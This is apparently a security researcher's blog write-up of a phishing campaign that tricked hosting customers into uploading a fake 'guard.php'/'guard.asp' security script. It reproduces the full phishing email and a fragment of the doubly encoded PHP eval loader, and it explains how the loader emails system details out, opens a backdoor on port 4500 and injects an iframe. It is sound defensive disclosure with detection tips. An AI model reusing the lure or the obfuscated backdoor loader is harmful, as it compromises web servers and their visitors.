PHP/WebGuard (and ASP/WebGuard) Attacks

By: Jose -

Last week I got three separate emails about an attack that people were seeing, blending phishing, a Trojan, a backdoor, and a website hack all in one. The whole thing relies on the target user falling prey to the “phish”. In this case, they’re not after someone’s bank account, they’re after their participation in a website hack. I didn’t write this up last week due to time constraints, and now this is receiving wider attention.

The Trojan/phish emails look innocent enough:

Dear COLO COMPANY valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html” or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
8) Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
8) Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

COLO COMPANY

COLO COMPANY is just dumped in there to fool you and is replaced by the organization you’re with. I’ve seen several high profile company’s customers targeted with this. The email contains an attachment named ‘guard.zip’, which extracts with two files (which they told you about in the email):

Archive:  guard.zip
Length     Date   Time    Name
--------    ----   ----    ----
161024  02-07-07 18:27   guard.asp
129732  02-08-07 02:15   guard.php
--------                   -------
290756                   2 files

These are just website server script files, and they’re plain text you can examine. The scripts themselves have a variable integer in them, and every copy of this I’ve seen has had a different integer. This means that static detection via MD5s is the files or email attachments will not work. The Snort sig (see below) takes this into account. If you take the time to look at the PHP you’ll see this:

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=155620;eval((base64_decode(base64_decode('SkU4d01E
QlBNRTh3TUQxbWIzQmxiaWdrVDA5UE1FOHdUekF3TENkeVlpY3BPM2RvYVd4bEtDMHRKRTh3TUU4d01FOHdNQ2xtWjJWMGN5Z2tUe
kF3TUU4d1R6QXdMREV3TWpRcE8yWm5aWFJ6S0NSUE1EQXdUekJQTURBc05EQTVOaWs3SkU5UE1EQlBNREJQTUQwb1ltRnpaVFkwWD
JSbFkyOWtaU2h6ZEhKMGNpaG1jbVZoWkNna1R6QXdNRTh3VHpBd0xETTNNaWtzSnpFeU16UTFOamM0T1RCQllVSmlRMk5FWkVWbFJ
tWkhaMGhvU1dsS2FrdHJUR3hOYlU1dVQyOVFjRkZ4VW5KVGMxUjBWWFZXZGxkM1dIaFplVnA2S3k4OUp5d25RVUpEUkVWR1IwaEpT
a3RNVFU1UFVGRlNVMVJWVmxkWVdWcGhZbU5rWldabmFHbHFhMnh0Ym05d2NYSnpkSFYyZDNoNWVqQXhNak0wTlRZM09Ea3JMeWNwS
1NrN1pYWmhiQ2drVDA4d01FOHdNRTh3S1RzPQ=='))));return;?>
...

Not overtly bad, but obviously not good. This is doubly encoded PHP at this point: base64 encoded and encoded with a private decoder that looks like this:

$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);
$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'1234567890AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRr
SsTtUuVvWwXxYyZz+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OO00O00O0);

After a couple of rounds of decoding you see that it will spit out some JavaScript and do two things on the server. First, it will send an email to the recipient:

To: firstbts@gmail.com
Subject: Darwin Ocho.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-517.12.7.obj~1/RELEASE_PPC Power Macintosh powerpc
From: L4M3r

Note that this email address is dead. (That subject line is just “uname -a”.) Secondly, it will try and backdoor your box on port 4500. But it will also spit out some HTML to the web clients that looks a bit like this:

[script language="JavaScript" type="text/javascript"]
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%
6A%61%76%61%73%63%72%69%70%7...

JavaScript, our old friend, and doubly encoded to boot (escaped and encoded, which in turn is decoded by a function dF() written to the browser in JavaScript). After decoding it, you’ll see (what your browser sees, ultimately) a page entitled “Enterprise Threat Protection” and an IFRAME that points to ht tp://westerncapitalfx.com/[REMOVE]images/php/index.php (URL deliberately obfuscated). When I looked last week it wasn’t live, and it doesn’t seem live now.All in all a not so sophisticated attack, but one that’s making the rounds. This has hit a few high profile hosting centers, so beware. The box you may be sharing with someone could be botted. Detecting this isn’t so hard, I helped Matt Jonkman develop Snort sigs for it. If you’re a webmaster, look for emails to that destination address. And if you’re looking for infected hosts, check port 4500 listeners. I believe some AV companies have added detection for this, too. Updated to add: I looked again, no one has any specific AV detection for this threat. AVG does detect a PHP backdoor, but this detection appears to be non-specific.

I finally did the writeup to save some people some time and to quit shuttling around private emails. I don’t know how widespread this is by this point.

Comments